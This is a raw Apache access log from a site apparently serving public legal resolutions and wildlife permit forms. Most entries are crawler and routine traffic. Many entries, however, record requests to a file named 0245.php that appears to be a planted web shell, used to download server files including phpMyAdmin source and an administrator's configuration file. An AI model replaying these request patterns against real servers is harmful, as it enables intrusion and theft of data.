201.245.192.253 - - [28/Jun/2024:03:35:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:35:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:03:35:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4871.pdf HTTP/1.1" 304 -
52.167.144.139 - - [28/Jun/2024:03:35:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/2691.pdf HTTP/1.1" 200 364528
172.22.2.4 - - [28/Jun/2024:03:34:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
66.249.66.12 - - [28/Jun/2024:03:36:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0834.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:36:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [28/Jun/2024:03:36:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4037.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:36:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2149.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:36:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3537.pdf HTTP/1.1" 200 337709
66.249.66.11 - - [28/Jun/2024:03:36:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4337.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:36:42 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202022/5434.pdf HTTP/1.1" 200 4438623
66.249.66.11 - - [28/Jun/2024:03:36:47 -0500] "GET /BLA/resoluciones/AUTOS%202014/5786.pdf HTTP/1.1" 200 201202
201.245.192.253 - - [28/Jun/2024:03:37:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:37:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36693
201.245.192.253 - - [28/Jun/2024:03:37:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
201.245.192.253 - - [28/Jun/2024:03:37:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:03:35:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61446
157.55.39.200 - - [28/Jun/2024:03:37:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1320.pdf HTTP/1.1" 200 558896
201.245.192.253 - - [28/Jun/2024:03:38:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:38:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
3.20.63.178 - - [28/Jun/2024:03:38:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [28/Jun/2024:03:38:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2534.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:39:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:39:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:03:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35333
52.167.144.139 - - [28/Jun/2024:03:39:25 -0500] "GET /Publicaciones/2024EE103969.pdf HTTP/1.1" 404 228
66.249.66.12 - - [28/Jun/2024:03:39:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/1526.pdf HTTP/1.1" 200 379261
66.249.66.12 - - [28/Jun/2024:03:39:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6746.pdf HTTP/1.1" 200 340713
216.245.221.92 - - [28/Jun/2024:03:39:53 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [28/Jun/2024:03:39:58 -0500] "GET /BLA/resoluciones/AUTOS%202023/05918.pdf HTTP/1.1" 200 986202
201.245.192.253 - - [28/Jun/2024:03:40:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:40:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
66.249.66.13 - - [28/Jun/2024:03:40:16 -0500] "GET /BLA/resoluciones/AUTOS%202023/4192.pdf HTTP/1.1" 200 422340
66.249.66.13 - - [28/Jun/2024:03:40:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0431.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Jun/2024:03:39:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:41:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:41:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:03:40:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
201.245.192.253 - - [28/Jun/2024:03:42:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:42:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2361.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:42:31 -0500] "GET /resoluciones/RESOLUCIONES%202009/7800.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [28/Jun/2024:03:43:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.20.151 - - [28/Jun/2024:03:43:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins%5C&f=ImportPlugin.class.php&ft=download&white=1 HTTP/1.1" 200 1174
201.245.192.253 - - [28/Jun/2024:03:43:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:03:43:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.20.144 - - [28/Jun/2024:03:43:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2635.pdf&ft=download&white=1 HTTP/1.1" 200 364199
47.128.111.52 - - [28/Jun/2024:03:43:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=Response.class.php&ft=download HTTP/1.1" 200 10025
34.198.201.66 - - [28/Jun/2024:03:43:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:44:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.30.224 - - [28/Jun/2024:03:44:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StringMB.class.php&ft=download HTTP/1.1" 200 2318
47.128.41.24 - - [28/Jun/2024:03:44:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDesktop&f=httpd22.conf.txt&ft=download HTTP/1.1" 200 18884
66.249.66.11 - - [28/Jun/2024:03:44:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3831.pdf HTTP/1.1" 304 -
47.128.119.83 - - [28/Jun/2024:03:44:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailtodisk&f=python27.dll&ft=download HTTP/1.1" 200 97954
47.128.121.183 - - [28/Jun/2024:03:44:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5770.pdf&ft=download&white=1 HTTP/1.1" 200 179879
216.245.221.92 - - [28/Jun/2024:03:44:53 -0500] "HEAD / HTTP/1.1" 200 -
47.128.57.129 - - [28/Jun/2024:03:45:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/%27%20%20%20%20%20.%20PMA_linkURL(%20%20%20%20%20%27https:/github.com/phpmyadmin/phpmyadmin/tree/%27%20%20%20%20%20.%20$GLOBALS[%27PMA_Config%27]-%3E%20%20%20get(%27PMA_VERSION_GIT_BRANCH%27)%20%20%20%20%20)%20%20%20%20%20.%20%27 HTTP/1.1" 403 1006
201.245.192.253 - - [28/Jun/2024:03:45:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.104 - - [28/Jun/2024:03:45:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=phpunit.xml.hhvm&ft=download HTTP/1.1" 200 1102
201.245.192.253 - - [28/Jun/2024:03:45:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.21.138 - - [28/Jun/2024:03:45:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StorageEngine.class.php&ft=download&white=1 HTTP/1.1" 200 14018
66.249.66.12 - - [28/Jun/2024:03:45:39 -0500] "GET /autoliquidacion/Fauna%20Silvestre/SALVODONCUTOI%20DE%20MOVILIZACI%C3%93N%20DE%20FAUNA%20SILVESTRE/PM04%20PR25%20F2%20Solicitud%20de%20expedici%C3%B3n%20de%20salvoconducto%20de%20movilizaci%C3%B3n%20de%20especimenes%20de%20la%20fauna%20silvestre.xls HTTP/1.1" 200 103424
66.249.66.12 - - [28/Jun/2024:03:45:40 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/&sort=date&order=desc HTTP/1.1" 200 3032
66.249.66.11 - - [28/Jun/2024:03:45:40 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/2416.pdf HTTP/1.1" 200 1121602
66.249.66.12 - - [28/Jun/2024:03:45:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2036.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:45:41 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/&sort=size&order=desc HTTP/1.1" 200 3032
47.128.113.8 - - [28/Jun/2024:03:45:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=display_structure.inc.php&ft=download&white=1 HTTP/1.1" 200 7280
201.245.192.253 - - [28/Jun/2024:03:46:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.31.45 - - [28/Jun/2024:03:46:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=sql.php&ft=download HTTP/1.1" 200 5587
47.128.51.207 - - [28/Jun/2024:03:46:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cdbi%5C&f=DBIMysqli.class.php&ft=download&white=1 HTTP/1.1" 200 22835
207.46.13.141 - - [28/Jun/2024:03:46:22 -0500] "GET /Publicaciones/2024EE124565.pdf HTTP/1.1" 200 241669
172.22.2.4 - - [28/Jun/2024:03:46:35 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 304 -
47.128.113.64 - - [28/Jun/2024:03:46:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_CiudadBolivar.flv&ft=download&white=1 HTTP/1.1" 200 327311
172.22.2.4 - - [28/Jun/2024:03:45:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.7 - - [28/Jun/2024:03:46:48 -0500] "GET /BLA/resoluciones/AUTOS%202022/3812.pdf HTTP/1.1" 200 385275
47.128.16.180 - - [28/Jun/2024:03:46:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=arrows.png&ft=download HTTP/1.1" 200 243
201.245.192.253 - - [28/Jun/2024:03:47:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.126.56 - - [28/Jun/2024:03:47:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StringCType.class.php&ft=download&white=1 HTTP/1.1" 200 2828
201.245.192.253 - - [28/Jun/2024:03:47:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.122.10 - - [28/Jun/2024:03:47:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=phpinfo.php&ft=download HTTP/1.1" 200 389
172.22.2.4 - - [28/Jun/2024:03:45:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59583
47.128.30.231 - - [28/Jun/2024:03:47:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=ChangeLog&ft=download HTTP/1.1" 200 14644
66.249.66.11 - - [28/Jun/2024:03:47:41 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/SALVODONCUTOI%20DE%20MOVILIZACI%D3N%20DE%20FAUNA%20SILVESTRE/&sort=size&order=asc HTTP/1.1" 200 3119
47.128.126.25 - - [28/Jun/2024:03:47:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024%5C&f=00377.pdf&ft=download&white=1 HTTP/1.1" 200 364198
201.245.192.253 - - [28/Jun/2024:03:48:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.41.168 - - [28/Jun/2024:03:48:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1887.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [28/Jun/2024:03:48:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
35.84.118.171 - - [28/Jun/2024:03:49:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:49:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.40.129 - - [28/Jun/2024:03:49:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4485.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [28/Jun/2024:03:49:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.7 - - [28/Jun/2024:03:49:25 -0500] "GET /Publicaciones/2024EE121955.pdf HTTP/1.1" 404 228
47.128.122.136 - - [28/Jun/2024:03:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=select_server.lib.php&ft=download HTTP/1.1" 200 3386
47.128.125.75 - - [28/Jun/2024:03:49:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Tracker.class.php&ft=download&white=1 HTTP/1.1" 200 34050
66.249.66.12 - - [28/Jun/2024:03:49:42 -0500] "GET /autoliquidacion/index.php?dir=Solicitud%20de%20expedici%F3n%20de%20certificados%20de%20estado%20de%20conservaci%F3n%20ambiental%20(CECA)/&sort=name&order=asc HTTP/1.1" 200 3722
216.245.221.92 - - [28/Jun/2024:03:49:53 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.12 - - [28/Jun/2024:03:49:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9510.pdf HTTP/1.1" 200 304609
47.128.36.121 - - [28/Jun/2024:03:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=tbl_columns_definition_form.inc.php&ft=download&white=1 HTTP/1.1" 200 5695
201.245.192.253 - - [28/Jun/2024:03:50:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.40.113 - - [28/Jun/2024:03:50:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=DatabaseInterface.class.php&ft=download HTTP/1.1" 200 84409
66.249.66.13 - - [28/Jun/2024:03:50:21 -0500] "GET /resoluciones/RESOLUCIONES%202010/1998.pdf HTTP/1.1" 404 1018
47.128.40.245 - - [28/Jun/2024:03:50:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800%5C&f=00001789.tif&ft=download&white=1 HTTP/1.1" 200 20131
172.22.2.4 - - [28/Jun/2024:03:50:38 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-146-16.docx HTTP/1.1" 200 23021
66.249.66.12 - - [28/Jun/2024:03:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202023/05841.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:50:42 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/AUTORIZACI%D3N%20DE%20EXPORTACI%D3N%20O%20IMPORTACI%D3N%20DE%20FAUNA%20SILVESTRE/&sort=size&order=asc HTTP/1.1" 200 3175
47.128.40.70 - - [28/Jun/2024:03:50:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=tbl_chart.lib.php&ft=download&white=1 HTTP/1.1" 200 10256
47.128.40.53 - - [28/Jun/2024:03:50:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0236.pdf&ft=download&white=1 HTTP/1.1" 200 597671
201.245.192.253 - - [28/Jun/2024:03:51:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.40.3 - - [28/Jun/2024:03:51:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=import.lib.php&ft=download HTTP/1.1" 200 42488
40.77.167.7 - - [28/Jun/2024:03:51:18 -0500] "GET /bla/resoluciones/autos%202010/3461.pdf HTTP/1.1" 200 419491
201.245.192.253 - - [28/Jun/2024:03:51:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.30.181 - - [28/Jun/2024:03:51:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=server_common.lib.php&ft=download&white=1 HTTP/1.1" 200 1989
66.249.66.11 - - [28/Jun/2024:03:51:43 -0500] "GET /autoliquidacion/Fauna%20Silvestre/Manual%20tramite%20en%20linea/Manual%20Usuario%20Evaluaci%C3%B3n%20Permiso%20de%20Aprovechamiento%20de%20Fauna.pdf HTTP/1.1" 200 1411862
66.249.66.12 - - [28/Jun/2024:03:51:43 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/AUTORIZACI%D3N%20DE%20EXPORTACI%D3N%20O%20IMPORTACI%D3N%20DE%20FAUNA%20SILVESTRE/&sort=name&order=desc HTTP/1.1" 200 3174
201.245.192.253 - - [28/Jun/2024:03:52:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:03:50:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [28/Jun/2024:03:52:43 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/SALVODONCUTOI%20DE%20MOVILIZACI%D3N%20DE%20FAUNA%20SILVESTRE/&sort=date&order=asc HTTP/1.1" 200 3119
201.245.192.253 - - [28/Jun/2024:03:53:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:53:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:03:51:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
201.245.192.253 - - [28/Jun/2024:03:53:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:03:54:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.12.251.153 - - [28/Jun/2024:03:54:08 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [28/Jun/2024:03:54:44 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/Manual%20tramite%20en%20linea/&sort=date&order=asc HTTP/1.1" 200 2520
216.245.221.92 - - [28/Jun/2024:03:54:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:55:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:55:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:03:56:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.202 - - [28/Jun/2024:03:56:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0478.pdf&ft=download&white=1 HTTP/1.1" 200 401063
190.24.56.230 - - [28/Jun/2024:03:56:33 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
190.24.56.230 - - [28/Jun/2024:03:56:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5143.pdf HTTP/1.1" 200 630562
66.249.66.13 - - [28/Jun/2024:03:56:44 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/SALVODONCUTOI%20DE%20MOVILIZACI%D3N%20DE%20FAUNA%20SILVESTRE/&sort=name&order=desc HTTP/1.1" 200 3118
47.128.113.152 - - [28/Jun/2024:03:56:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2134.pdf&ft=download&white=1 HTTP/1.1" 200 360103
47.128.29.69 - - [28/Jun/2024:03:57:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5601.pdf&ft=download&white=1 HTTP/1.1" 200 577191
201.245.192.253 - - [28/Jun/2024:03:57:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.121 - - [28/Jun/2024:03:57:10 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2016%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 346378
47.128.118.86 - - [28/Jun/2024:03:57:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Theme_Manager.class.php&ft=download HTTP/1.1" 200 11244
201.245.192.253 - - [28/Jun/2024:03:57:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.24.56.230 - - [28/Jun/2024:03:57:22 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2010%2F HTTP/1.1" 200 1307967
190.24.56.230 - - [28/Jun/2024:03:57:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3004.pdf HTTP/1.1" 200 1162423
47.128.113.159 - - [28/Jun/2024:03:57:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=tbl_indexes.lib.php&ft=download HTTP/1.1" 200 12166
66.249.66.13 - - [28/Jun/2024:03:57:44 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/AUTORIZACI%D3N%20DE%20EXPORTACI%D3N%20O%20IMPORTACI%D3N%20DE%20FAUNA%20SILVESTRE/&sort=date&order=asc HTTP/1.1" 200 3175
66.249.66.13 - - [28/Jun/2024:03:57:44 -0500] "GET /autoliquidacion/index.php?dir=Permiso%20de%20ocupaci%F3n%20de%20cauce/&sort=date&order=desc HTTP/1.1" 200 2433
66.249.66.13 - - [28/Jun/2024:03:57:45 -0500] "GET /autoliquidacion/Fauna%20Silvestre/Evaluaci%C3%B3n%20y%20seguimiento%20de%20permisos%20de%20aprovechamiento%20de%20fauna%20silvestre/PM04-PR26-F4_Solicituddeingresoegresoyofraccionamiento_V1_31122023.xls HTTP/1.1" 200 218624
47.128.118.7 - - [28/Jun/2024:03:57:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=mult_submits.lib.php&ft=download HTTP/1.1" 200 21380
190.24.56.230 - - [28/Jun/2024:03:57:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2012%2F HTTP/1.1" 200 140066
190.24.56.230 - - [28/Jun/2024:03:57:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1384.pdf HTTP/1.1" 200 632967
47.128.119.104 - - [28/Jun/2024:03:58:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=common.inc.php&ft=download&white=1 HTTP/1.1" 200 34488
201.245.192.253 - - [28/Jun/2024:03:58:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.125.137 - - [28/Jun/2024:03:58:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Csendmail%5C&f=ssleay32.dll&ft=download&white=1 HTTP/1.1" 200 274083
172.22.2.4 - - [28/Jun/2024:03:56:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:58:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
